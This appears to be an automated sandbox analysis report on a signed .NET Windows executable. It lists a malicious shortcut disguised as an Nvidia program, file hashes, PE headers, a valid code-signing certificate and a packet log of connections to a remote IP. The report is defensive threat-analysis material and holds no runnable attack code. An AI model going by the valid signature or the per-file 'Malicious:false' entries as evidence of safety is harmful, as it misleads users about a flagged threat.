                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 13:28:41 2024, mtime=Fri Dec 20 13:28:41 2024, atime=Wed Dec 18 08:09:54 2024, length=8816544, window=hide
                                                      Category:modified
                                                      Size (bytes):695
                                                      Entropy (8bit):4.612876753002947
                                                      Encrypted:false
                                                      SSDEEP:12:8qcZ8i/vi5LOnd0zKBihOjAXISIStvzwlZlqmV:8jn2KYyAX9Xhxm
                                                      MD5:EA0649B0BCE06C19E7C418C0AEBB15AD
                                                      SHA1:54C8157ABCC5DAA9631AB663A576D45009083C4E
                                                      SHA-256:F98EA64720CCCF6FEBE3A36191503DEF98B08D439FEA64D49EC9055A0C3EA9C5
                                                      SHA-512:B13CD9E4A725C46F57F5A13280BA7E74AE7D4AF0385BA45B1DBA0A1533D296CFF719A226F08F594286021B5B3C310265FD00FF7AB0FDA1D2632AA66B5727FB36
                                                      Malicious:true
                                                      Preview:L..................F.... ...$.w.R....w.R.....,Q...............................P.O. .:i.....+00.../C:\...................b.1......Y.s..NVIDIA~1..J......Y.s.Y.s..........................3W..N.v.i.d.i.a.-.7.5.6.1.9.....n.2......Y;I .NVIDIA~1.EXE..R......Y.s.Y.s....Q.........................N.v.i.d.i.a.-.7.5.6.1.9...e.x.e.......O...............-.......N..............v.....C:\Nvidia-75619\Nvidia-75619.exe..8.....\.....\.....\.....\.....\.....\.....\.....\.....\.N.v.i.d.i.a.-.7.5.6.1.9.\.N.v.i.d.i.a.-.7.5.6.1.9...e.x.e.`.......X.......841618...........hT..CrF.f4... ...2=.b...,...W..hT..CrF.f4... ...2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):4.887141700027076
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:PVKDyWHOaX.exe
                                                      File size:133'536 bytes
                                                      MD5:79ab86017b2c9b713d6af08086b1937f
                                                      SHA1:4214a09a7a12b341b9b5290b448e2a321a1f4566
                                                      SHA256:07b5b4156d1f3adbb7728ba7a7d538af04e7cca8e396a19f5446bb2043a6e3db
                                                      SHA512:6be2c7385c6e2796993d8ead6cf8b12e0114213e633c902653aa7069e3dc2c4e7354def3c8565186140b3f5a59b09e685c9e775c4ec8cf55201a9437e1e15428
                                                      SSDEEP:3072:6xh9iQPz6TYcwoMEFBW1vxzXY8F+0FzWLKH:+9D6TYcwoMEFBW1vTH
                                                      TLSH:05D350916CDF40CAF26787B02FC8FAFF05E6FAA5181E71BD60C1A6184771EC48951AB4
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.dg................................. ........@.. .......................@.......<....@................................
                                                      Icon Hash:2d361616e3ac6d39
                                                      Entrypoint:0x40ebde
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6764AB27 [Thu Dec 19 23:24:23 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Signature Valid:true
                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                      Signature Validation Error:The operation completed successfully
                                                      Error Number:0
                                                      Not Before, Not After
                                                      • 13/12/2024 16:10:46 14/12/2025 16:10:46
                                                      Subject Chain
                                                      • E=pagamentosdigitaais@gmail.com, CN=PAGAMENTOS DIGITAIS LTDA, O=PAGAMENTOS DIGITAIS LTDA, L=JOAO PESSOA, S=PARAIBA, C=BR, OID.1.3.6.1.4.1.311.60.2.1.3=BR, SERIALNUMBER=55.972.702/0001-29, OID.2.5.4.15=Private Organization
                                                      Version:3
                                                      Thumbprint MD5:FC24237D18BE5D7114AA3DCDAAE6AD6C
                                                      Thumbprint SHA-1:3C9DB92427EA2A17F23D86D1B5704C90C1949548
                                                      Thumbprint SHA-256:19BAF25862979BC0C7CB3971187128986BEB6DB4A4C6986B452A286850E570B0
                                                      Serial:0B98FD483EA0DD6E7C6A6317
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xeb880x53.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x10e48.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1e0000x29a0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x220000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xcbe40xcc0060bcacee8ba2d89f0644c69afd53798bFalse0.19847196691176472data3.5523134104457434IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x100000x10e480x11000dea4a8d7dd41ef218d51c7dd3c5f8cf6False0.26286764705882354data4.584280638931634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x220000xc0x200381d30c51d76428ebab89337171b6482False0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x104200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.2592274931976813
                                                      RT_GROUP_ICON0x20c480x14data1.25
                                                      RT_VERSION0x101300x2ecdata0.43716577540106955
                                                      RT_MANIFEST0x20c600x1e4ASCII text, with CRLF line terminators0.5330578512396694
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 20, 2024 15:28:22.041398048 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:22.041444063 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:22.041627884 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:22.044531107 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:22.044547081 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:23.498688936 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:23.498900890 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:23.501606941 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:23.501616955 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:23.501866102 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:23.528084040 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:23.571350098 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:24.041059971 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:24.041141987 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:24.041192055 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:24.041276932 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:24.041299105 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:24.041316032 CET49712443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:24.041325092 CET4434971234.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:24.082036018 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:24.082075119 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:24.082176924 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:24.082369089 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:24.082390070 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:25.533751965 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:25.534383059 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:25.534409046 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:25.535109997 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:25.535115957 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.095617056 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.095648050 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.095751047 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.095777035 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.141458988 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.212815046 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.212826967 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.212899923 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.294241905 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.294332981 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.319341898 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.319406033 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.345067978 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.345146894 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.366669893 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.366731882 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.471301079 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.471385956 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.484756947 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.484857082 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.501342058 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.501440048 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.512298107 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.512398005 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.524029970 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.524131060 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.532826900 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.532906055 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.543858051 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.543936014 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.551520109 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.551580906 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.661287069 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.661355019 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.667865992 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.667939901 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.676708937 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.676773071 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.683319092 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.683387995 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.689733028 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.689812899 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.698206902 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.698287010 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.704705000 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.704771996 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.711294889 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.711369038 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.716804981 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.716864109 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.723232031 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.723310947 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.728279114 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.728358984 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.733495951 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.733705997 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.778620005 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.778851986 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.853085041 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.853286028 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.856602907 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.856689930 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.861506939 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.861596107 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.865345001 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.865447044 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.869343042 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.869427919 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.874393940 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.874634981 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.878154993 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.878237009 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.882738113 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.882806063 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.886231899 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.886312008 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.890990973 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.891056061 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.894351006 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.894438982 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.899436951 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.899518013 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.903213978 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.903275013 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.907196045 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.907262087 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.912194967 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.912271976 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:26.971405983 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:26.971503019 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.045207024 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.045404911 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.048260927 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.048342943 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.051840067 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.051903009 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.054713964 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.054779053 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.058605909 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.058676958 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.060626984 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.060693979 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.064407110 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.064502954 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.067152023 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.067224979 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.070153952 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.070240974 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.073378086 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.073457003 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.076402903 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.076508045 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.079262018 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.079339027 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.091262102 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.091392994 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.094162941 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.094229937 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.096848011 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.096913099 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.162837982 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.162985086 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.235750914 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.235826015 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.238877058 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.238948107 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.241333961 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.241400003 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.244241953 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.244304895 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.246449947 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.246512890 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.249613047 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.249686003 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.252175093 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.252237082 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.254784107 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.254848957 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.257313013 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.257371902 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.260376930 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.260436058 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.263250113 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.263326883 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.265758038 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.265819073 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.282087088 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.282268047 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.284573078 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.284646034 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.287271023 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.287329912 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.354207039 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.354358912 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.428849936 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.428997040 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.431529045 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.431615114 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.433954000 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.434012890 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.436707020 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.436800957 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.439342022 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.439413071 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.442266941 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.442332029 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.444674969 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.444736958 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.447444916 CET4434971834.95.215.169192.168.2.5
